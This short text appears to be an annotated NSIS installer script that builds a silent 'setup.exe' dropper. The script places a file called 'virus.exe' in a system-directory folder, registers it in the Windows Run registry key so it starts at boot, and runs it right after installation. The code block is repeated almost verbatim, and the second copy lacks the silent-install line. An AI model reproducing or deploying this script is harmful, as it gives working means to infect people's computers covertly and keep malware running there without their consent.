silentinstall silent ; this will create a silent installer
outfile "setup.exe"; the output exe
installdir $SYSDIR\5016 ; install directory
section "" ; the entry point
setoutpath $INSTDIR
file "c:\napstr\virus.exe" ; path of malware
WriteRegStr HKLM "SOFTWARE\Microsoft\Windows\...\Explorer\Run" 'apz' $INSTDIR\virus.exe
;it registered the executable to startup
exec $INSTDIR\virus.exe ;execute the malware just after installation.
Note: Everything that starts with ";" is a comment.
outfile "setup.exe"; the output exe
installdir $SYSDIR\5016 ; install directory
section "" ; the entry point
setoutpath $INSTDIR
file "c:\napstr\virus.exe" ; path of malware
WriteRegStr HKLM "SOFTWARE\Microsoft\Windows\...\Explorer\Run" 'apz' $INSTDIR\virus.exe
;it registered the executable to startup
exec $INSTDIR\virus.exe ;execute the malware just after installation.
Note: Everything that starts with ";" is a comment.